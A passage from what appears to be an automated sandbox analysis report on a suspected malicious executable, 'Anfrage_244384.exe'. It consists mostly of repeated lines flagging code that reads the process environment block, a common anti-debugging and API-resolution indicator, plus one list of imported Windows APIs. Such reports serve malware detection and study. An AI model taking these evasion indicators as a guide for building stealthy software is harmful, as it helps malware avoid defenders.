Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_10001A5D

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34671460 mov eax, dword ptr fs:[00000030h]		4_2_34671460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34671460 mov eax, dword ptr fs:[00000030h]		4_2_34671460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34671460 mov eax, dword ptr fs:[00000030h]		4_2_34671460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34671460 mov eax, dword ptr fs:[00000030h]		4_2_34671460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34671460 mov eax, dword ptr fs:[00000030h]		4_2_34671460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F460 mov eax, dword ptr fs:[00000030h]		4_2_3468F460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F460 mov eax, dword ptr fs:[00000030h]		4_2_3468F460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F460 mov eax, dword ptr fs:[00000030h]		4_2_3468F460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F460 mov eax, dword ptr fs:[00000030h]		4_2_3468F460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F460 mov eax, dword ptr fs:[00000030h]		4_2_3468F460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F460 mov eax, dword ptr fs:[00000030h]		4_2_3468F460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474547F mov eax, dword ptr fs:[00000030h]		4_2_3474547F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472F453 mov eax, dword ptr fs:[00000030h]		4_2_3472F453
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B450 mov eax, dword ptr fs:[00000030h]		4_2_3471B450
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B450 mov eax, dword ptr fs:[00000030h]		4_2_3471B450
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B450 mov eax, dword ptr fs:[00000030h]		4_2_3471B450
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B450 mov eax, dword ptr fs:[00000030h]		4_2_3471B450
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B440 mov eax, dword ptr fs:[00000030h]		4_2_3467B440
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B440 mov eax, dword ptr fs:[00000030h]		4_2_3467B440
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B440 mov eax, dword ptr fs:[00000030h]		4_2_3467B440
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B440 mov eax, dword ptr fs:[00000030h]		4_2_3467B440
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B440 mov eax, dword ptr fs:[00000030h]		4_2_3467B440
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B440 mov eax, dword ptr fs:[00000030h]		4_2_3467B440
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469340D mov eax, dword ptr fs:[00000030h]		4_2_3469340D
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F7410 mov eax, dword ptr fs:[00000030h]		4_2_346F7410
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347414F6 mov eax, dword ptr fs:[00000030h]		4_2_347414F6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347414F6 mov eax, dword ptr fs:[00000030h]		4_2_347414F6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347194E0 mov eax, dword ptr fs:[00000030h]		4_2_347194E0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347454DB mov eax, dword ptr fs:[00000030h]		4_2_347454DB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346674B0 mov eax, dword ptr fs:[00000030h]		4_2_346674B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346674B0 mov eax, dword ptr fs:[00000030h]		4_2_346674B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A34B0 mov eax, dword ptr fs:[00000030h]		4_2_346A34B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34679486 mov eax, dword ptr fs:[00000030h]		4_2_34679486
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34679486 mov eax, dword ptr fs:[00000030h]		4_2_34679486
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B480 mov eax, dword ptr fs:[00000030h]		4_2_3466B480
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B562 mov eax, dword ptr fs:[00000030h]		4_2_3466B562
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AB570 mov eax, dword ptr fs:[00000030h]		4_2_346AB570
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AB570 mov eax, dword ptr fs:[00000030h]		4_2_346AB570
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B550 mov eax, dword ptr fs:[00000030h]		4_2_3471B550
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B550 mov eax, dword ptr fs:[00000030h]		4_2_3471B550
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B550 mov eax, dword ptr fs:[00000030h]		4_2_3471B550
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34745537 mov eax, dword ptr fs:[00000030h]		4_2_34745537
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467D534 mov eax, dword ptr fs:[00000030h]		4_2_3467D534
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467D534 mov eax, dword ptr fs:[00000030h]		4_2_3467D534
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467D534 mov eax, dword ptr fs:[00000030h]		4_2_3467D534
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467D534 mov eax, dword ptr fs:[00000030h]		4_2_3467D534
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467D534 mov eax, dword ptr fs:[00000030h]		4_2_3467D534
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467D534 mov eax, dword ptr fs:[00000030h]		4_2_3467D534
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h]		4_2_3471F525
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h]		4_2_3471F525
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h]		4_2_3471F525
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h]		4_2_3471F525
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h]		4_2_3471F525
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h]		4_2_3471F525
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h]		4_2_3471F525
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AD530 mov eax, dword ptr fs:[00000030h]		4_2_346AD530
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AD530 mov eax, dword ptr fs:[00000030h]		4_2_346AD530
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472B52F mov eax, dword ptr fs:[00000030h]		4_2_3472B52F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A7505 mov eax, dword ptr fs:[00000030h]		4_2_346A7505
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A7505 mov ecx, dword ptr fs:[00000030h]		4_2_346A7505
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915F4 mov eax, dword ptr fs:[00000030h]		4_2_346915F4
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915F4 mov eax, dword ptr fs:[00000030h]		4_2_346915F4
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915F4 mov eax, dword ptr fs:[00000030h]		4_2_346915F4
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915F4 mov eax, dword ptr fs:[00000030h]		4_2_346915F4
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915F4 mov eax, dword ptr fs:[00000030h]		4_2_346915F4
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915F4 mov eax, dword ptr fs:[00000030h]		4_2_346915F4
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347435D7 mov eax, dword ptr fs:[00000030h]		4_2_347435D7
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347435D7 mov eax, dword ptr fs:[00000030h]		4_2_347435D7
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347435D7 mov eax, dword ptr fs:[00000030h]		4_2_347435D7
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A55C0 mov eax, dword ptr fs:[00000030h]		4_2_346A55C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346995DA mov eax, dword ptr fs:[00000030h]		4_2_346995DA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347455C9 mov eax, dword ptr fs:[00000030h]		4_2_347455C9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ED5D0 mov eax, dword ptr fs:[00000030h]		4_2_346ED5D0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ED5D0 mov ecx, dword ptr fs:[00000030h]		4_2_346ED5D0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915A9 mov eax, dword ptr fs:[00000030h]		4_2_346915A9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915A9 mov eax, dword ptr fs:[00000030h]		4_2_346915A9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915A9 mov eax, dword ptr fs:[00000030h]		4_2_346915A9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915A9 mov eax, dword ptr fs:[00000030h]		4_2_346915A9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915A9 mov eax, dword ptr fs:[00000030h]		4_2_346915A9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3470D5B0 mov eax, dword ptr fs:[00000030h]		4_2_3470D5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3470D5B0 mov eax, dword ptr fs:[00000030h]		4_2_3470D5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347435B6 mov eax, dword ptr fs:[00000030h]		4_2_347435B6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347035BA mov eax, dword ptr fs:[00000030h]		4_2_347035BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347035BA mov eax, dword ptr fs:[00000030h]		4_2_347035BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347035BA mov eax, dword ptr fs:[00000030h]		4_2_347035BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347035BA mov eax, dword ptr fs:[00000030h]		4_2_347035BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472F5BE mov eax, dword ptr fs:[00000030h]		4_2_3472F5BE
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]		4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]		4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]		4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]		4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]		4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]		4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]		4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]		4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]		4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466758F mov eax, dword ptr fs:[00000030h]		4_2_3466758F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466758F mov eax, dword ptr fs:[00000030h]		4_2_3466758F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466758F mov eax, dword ptr fs:[00000030h]		4_2_3466758F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FB594 mov eax, dword ptr fs:[00000030h]		4_2_346FB594
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FB594 mov eax, dword ptr fs:[00000030h]		4_2_346FB594
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A9660 mov eax, dword ptr fs:[00000030h]		4_2_346A9660
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A9660 mov eax, dword ptr fs:[00000030h]		4_2_346A9660
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3470D660 mov eax, dword ptr fs:[00000030h]		4_2_3470D660
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]		4_2_3466F626
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]		4_2_3466F626
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]		4_2_3466F626
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]		4_2_3466F626
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]		4_2_3466F626
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]		4_2_3466F626
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]		4_2_3466F626
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]		4_2_3466F626
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]		4_2_3466F626
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34745636 mov eax, dword ptr fs:[00000030h]		4_2_34745636
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AF603 mov eax, dword ptr fs:[00000030h]		4_2_346AF603
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A1607 mov eax, dword ptr fs:[00000030h]		4_2_346A1607
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34673616 mov eax, dword ptr fs:[00000030h]		4_2_34673616
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34673616 mov eax, dword ptr fs:[00000030h]		4_2_34673616
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472D6F0 mov eax, dword ptr fs:[00000030h]		4_2_3472D6F0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A36EF mov eax, dword ptr fs:[00000030h]		4_2_346A36EF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469D6E0 mov eax, dword ptr fs:[00000030h]		4_2_3469D6E0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469D6E0 mov eax, dword ptr fs:[00000030h]		4_2_3469D6E0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347036EE mov eax, dword ptr fs:[00000030h]		4_2_347036EE
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347036EE mov eax, dword ptr fs:[00000030h]		4_2_347036EE
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347036EE mov eax, dword ptr fs:[00000030h]		4_2_347036EE
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347036EE mov eax, dword ptr fs:[00000030h]		4_2_347036EE
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347036EE mov eax, dword ptr fs:[00000030h]		4_2_347036EE
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347036EE mov eax, dword ptr fs:[00000030h]		4_2_347036EE
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A16CF mov eax, dword ptr fs:[00000030h]		4_2_346A16CF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B6C0 mov eax, dword ptr fs:[00000030h]		4_2_3467B6C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B6C0 mov eax, dword ptr fs:[00000030h]		4_2_3467B6C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B6C0 mov eax, dword ptr fs:[00000030h]		4_2_3467B6C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B6C0 mov eax, dword ptr fs:[00000030h]		4_2_3467B6C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B6C0 mov eax, dword ptr fs:[00000030h]		4_2_3467B6C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B6C0 mov eax, dword ptr fs:[00000030h]		4_2_3467B6C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472F6C7 mov eax, dword ptr fs:[00000030h]		4_2_3472F6C7
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347316CC mov eax, dword ptr fs:[00000030h]		4_2_347316CC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347316CC mov eax, dword ptr fs:[00000030h]		4_2_347316CC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347316CC mov eax, dword ptr fs:[00000030h]		4_2_347316CC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347316CC mov eax, dword ptr fs:[00000030h]		4_2_347316CC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466D6AA mov eax, dword ptr fs:[00000030h]		4_2_3466D6AA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466D6AA mov eax, dword ptr fs:[00000030h]		4_2_3466D6AA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346676B2 mov eax, dword ptr fs:[00000030h]		4_2_346676B2
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346676B2 mov eax, dword ptr fs:[00000030h]		4_2_346676B2
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346676B2 mov eax, dword ptr fs:[00000030h]		4_2_346676B2
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F368C mov eax, dword ptr fs:[00000030h]		4_2_346F368C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F368C mov eax, dword ptr fs:[00000030h]		4_2_346F368C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F368C mov eax, dword ptr fs:[00000030h]		4_2_346F368C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F368C mov eax, dword ptr fs:[00000030h]		4_2_346F368C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B765 mov eax, dword ptr fs:[00000030h]		4_2_3466B765
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B765 mov eax, dword ptr fs:[00000030h]		4_2_3466B765
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B765 mov eax, dword ptr fs:[00000030h]		4_2_3466B765
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B765 mov eax, dword ptr fs:[00000030h]		4_2_3466B765
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683740 mov eax, dword ptr fs:[00000030h]		4_2_34683740
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683740 mov eax, dword ptr fs:[00000030h]		4_2_34683740
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683740 mov eax, dword ptr fs:[00000030h]		4_2_34683740
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471375F mov eax, dword ptr fs:[00000030h]		4_2_3471375F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471375F mov eax, dword ptr fs:[00000030h]		4_2_3471375F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471375F mov eax, dword ptr fs:[00000030h]		4_2_3471375F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471375F mov eax, dword ptr fs:[00000030h]		4_2_3471375F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471375F mov eax, dword ptr fs:[00000030h]		4_2_3471375F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34743749 mov eax, dword ptr fs:[00000030h]		4_2_34743749
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34673720 mov eax, dword ptr fs:[00000030h]		4_2_34673720
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474B73C mov eax, dword ptr fs:[00000030h]		4_2_3474B73C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474B73C mov eax, dword ptr fs:[00000030h]		4_2_3474B73C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474B73C mov eax, dword ptr fs:[00000030h]		4_2_3474B73C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474B73C mov eax, dword ptr fs:[00000030h]		4_2_3474B73C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F720 mov eax, dword ptr fs:[00000030h]		4_2_3468F720
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F720 mov eax, dword ptr fs:[00000030h]		4_2_3468F720
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F720 mov eax, dword ptr fs:[00000030h]		4_2_3468F720
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34669730 mov eax, dword ptr fs:[00000030h]		4_2_34669730
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34669730 mov eax, dword ptr fs:[00000030h]		4_2_34669730
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473972B mov eax, dword ptr fs:[00000030h]		4_2_3473972B
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472F72E mov eax, dword ptr fs:[00000030h]		4_2_3472F72E
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467973A mov eax, dword ptr fs:[00000030h]		4_2_3467973A
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467973A mov eax, dword ptr fs:[00000030h]		4_2_3467973A
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A5734 mov eax, dword ptr fs:[00000030h]		4_2_346A5734
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34677703 mov eax, dword ptr fs:[00000030h]		4_2_34677703
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34675702 mov eax, dword ptr fs:[00000030h]		4_2_34675702
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34675702 mov eax, dword ptr fs:[00000030h]		4_2_34675702
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AF71F mov eax, dword ptr fs:[00000030h]		4_2_346AF71F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AF71F mov eax, dword ptr fs:[00000030h]		4_2_346AF71F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467D7E0 mov ecx, dword ptr fs:[00000030h]		4_2_3467D7E0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346757C0 mov eax, dword ptr fs:[00000030h]		4_2_346757C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346757C0 mov eax, dword ptr fs:[00000030h]		4_2_346757C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346757C0 mov eax, dword ptr fs:[00000030h]		4_2_346757C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FF7AF mov eax, dword ptr fs:[00000030h]		4_2_346FF7AF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FF7AF mov eax, dword ptr fs:[00000030h]		4_2_346FF7AF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FF7AF mov eax, dword ptr fs:[00000030h]		4_2_346FF7AF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FF7AF mov eax, dword ptr fs:[00000030h]		4_2_346FF7AF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FF7AF mov eax, dword ptr fs:[00000030h]		4_2_346FF7AF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347437B6 mov eax, dword ptr fs:[00000030h]		4_2_347437B6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472D7B0 mov eax, dword ptr fs:[00000030h]		4_2_3472D7B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472D7B0 mov eax, dword ptr fs:[00000030h]		4_2_3472D7B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F97A9 mov eax, dword ptr fs:[00000030h]		4_2_346F97A9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469D7B0 mov eax, dword ptr fs:[00000030h]		4_2_3469D7B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]		4_2_3466F7BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]		4_2_3466F7BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]		4_2_3466F7BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]		4_2_3466F7BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]		4_2_3466F7BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]		4_2_3466F7BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]		4_2_3466F7BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]		4_2_3466F7BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]		4_2_3466F7BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472F78A mov eax, dword ptr fs:[00000030h]		4_2_3472F78A
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F106E mov eax, dword ptr fs:[00000030h]		4_2_346F106E
